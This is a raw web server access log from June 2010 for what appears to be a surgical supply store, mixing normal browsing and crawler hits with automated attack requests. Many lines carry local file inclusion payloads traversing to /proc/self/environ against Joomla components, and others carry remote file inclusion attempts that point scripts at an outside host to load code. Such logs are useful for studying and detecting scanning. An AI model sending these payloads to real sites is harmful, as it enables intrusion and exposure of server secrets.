95.156.233.139 - - [23/Jun/2010:00:33:22 -0400] "GET /logs/error_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
67.195.114.223 - - [23/Jun/2010:00:33:17 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02 HTTP/1.0" 200 65463 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
109.71.41.45 - - [23/Jun/2010:00:33:23 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
149.31.6.24 - - [23/Jun/2010:00:33:55 -0400] "GET /logs//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:33:55 -0400] "GET /logs/error_log.Q109092700//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:33:55 -0400] "GET //citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:33:56 -0400] "GET /logs//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:33:56 -0400] "GET /logs/error_log.Q109092700//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.121.64.231 - - [23/Jun/2010:00:33:56 -0400] "GET /logs/error_log.Q110061300//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
149.31.6.24 - - [23/Jun/2010:00:33:56 -0400] "GET //citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.249.71.206 - - [23/Jun/2010:00:33:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0240D36A1FF3B000A45B032+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
149.31.6.24 - - [23/Jun/2010:00:33:58 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:34:00 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
174.121.64.231 - - [23/Jun/2010:00:34:06 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
174.121.64.231 - - [23/Jun/2010:00:34:06 -0400] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.64.231 - - [23/Jun/2010:00:34:06 -0400] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
174.121.64.231 - - [23/Jun/2010:00:34:16 -0400] "GET /logs/access_log.Q110051300//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.74.136.238 - - [23/Jun/2010:00:34:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.74.136.238 - - [23/Jun/2010:00:34:19 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.74.136.238 - - [23/Jun/2010:00:34:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.74.136.238 - - [23/Jun/2010:00:34:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
109.71.41.45 - - [23/Jun/2010:00:34:26 -0400] "GET /logs/error_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
149.31.6.24 - - [23/Jun/2010:00:34:29 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:34:29 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:34:29 -0400] "GET /logs/access_log.Q109100900//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
95.156.233.139 - - [23/Jun/2010:00:34:50 -0400] "GET /logs/access_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:34:50 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:34:50 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:35:26 -0400] "GET /logs/access_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:35:26 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:35:26 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
201.36.173.93 - - [23/Jun/2010:00:36:01 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
201.36.173.93 - - [23/Jun/2010:00:36:01 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
201.36.173.93 - - [23/Jun/2010:00:36:02 -0400] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
95.156.233.139 - - [23/Jun/2010:00:36:03 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:36:03 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:36:04 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:36:12 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:36:12 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:36:12 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
149.31.6.24 - - [23/Jun/2010:00:36:20 -0400] "GET /logs/access_log.Q109100900%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:36:23 -0400] "GET /logs/error_log.Q109111100////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
109.71.41.45 - - [23/Jun/2010:00:36:38 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:36:39 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
202.160.123.72 - - [23/Jun/2010:00:36:49 -0400] "GET /logs/error_log.Q110051200//xmlrpc.php HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.160.123.72 - - [23/Jun/2010:00:36:50 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
202.160.123.72 - - [23/Jun/2010:00:36:50 -0400] "GET /logs//xmlrpc.php HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
24.118.133.95 - - [23/Jun/2010:00:37:06 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 77252 "http://www.acesurgical.com/nuoss_particulates.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:08 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:09 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:09 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:09 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:09 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:10 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
209.59.12.99 - - [23/Jun/2010:00:37:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.118.133.95 - - [23/Jun/2010:00:37:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LF23A6869025435001E7C09C+M37+ENG HTTP/1.1" 200 71820 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:17 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LF23A6869025435001E7C09C+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:17 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LF23A6869025435001E7C09C+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.118.133.95 - - [23/Jun/2010:00:37:17 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LF23A6869025435001E7C09C+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.195.114.223 - - [23/Jun/2010:00:36:37 -0400] "GET /logs/error_log.Q110030900 HTTP/1.0" 200 4817220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.156.233.139 - - [23/Jun/2010:00:37:23 -0400] "GET /logs/error_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
67.195.114.223 - - [23/Jun/2010:00:37:23 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.0" 200 71820 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
109.71.41.45 - - [23/Jun/2010:00:37:33 -0400] "GET /logs/error_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:37:40 -0400] "GET /logs/error_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:37:44 -0400] "GET /logs/error_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
95.156.233.139 - - [23/Jun/2010:00:37:47 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:37:49 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
149.31.6.24 - - [23/Jun/2010:00:39:14 -0400] "GET /logs/error_log.Q109092700%20%20//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:39:14 -0400] "GET /logs/access_log.Q109053100%20%20//citywriter/head.php?path=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
95.156.233.139 - - [23/Jun/2010:00:39:22 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
